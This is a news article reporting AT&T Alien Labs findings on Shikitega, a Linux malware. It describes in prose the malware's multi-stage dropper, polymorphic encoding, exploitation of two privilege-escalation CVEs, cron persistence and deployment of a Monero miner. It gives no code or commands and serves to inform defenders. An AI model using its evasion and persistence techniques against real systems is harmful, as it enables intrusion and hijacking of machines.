Researchers at AT&T Alien Labs have discovered a new Linux malware known as Shikitega. The malware targets computers and IoT devices and exploits vulnerabilities in the Linux system to elevate privileges, add persistence and launch a crypto miner on the target system.
The malware uses a polymorphic encoder to evade detection by making static, signature-based detection virtually impossible. Furthermore, it downloads and executes Metasploit’s “Mettle” meterpreter to maximise control over infected devices and abuses legitimate cloud services to store its command and control servers.
Metasploit is a popular penetration testing suite often found bundled with specialised operating systems like Kali Linux. Its uses often include creating malicious payloads for pretty much everything under the sun, including Linux devices and Android phones.
A layered infection chain
According to the researchers, Shikitega uses a multi-layer infection chain. The first step only contains a few hundred bytes and is divided into modules, each responsible for a specific task including downloading and executing the Metasploit meterpreter, exploiting Linux vulnerabilities (CVE-2021-4034 and CVE-2021-3493) to escalate privileges, setting persistence in the infected machine using Cron and finally downloading and executing a crypto miner.
The main dropper is a small ELF file about 370 bytes in size. The actual code is even smaller coming in at around 300 bytes. It derives its name from the “Shikata Ga Nai” polymorphic XOR additive feedback encoder. This allows the malware to run in looped stages where each loop decodes the next stage until the final payload is decoded and executed.
Once execution is complete, the C&C server kicks in with additional shell command to execute on the target machine. This involves downloading additional files from the server that are executed from the memory only. These files aren’t saved in the hard drive, further minimising detection chances.
As for persistence, the malware downloads and executes five different shell scripts and persists in the system by setting four crontabs — two for the currently logged-in user and two for the root user. The malware even checks whether or not the crontab command exists on the system before installing the malicious cron services. Additionally, to ensure that only one instance of the malware runs at any given time, it uses flock with a lock file.
Finally, the malware downloads and executes the XMRing miner (version 6.17.0), a popular miner for Monero. It also sets an additional crontab to download and execute the crypto miner for the C&C server.
The researchers have recommended keeping software up to date, having antivirus or EDR installed in all endpoints and using a backup system to backup server files as recommended actions. That said, the malware is still expected to be a major headache for some time.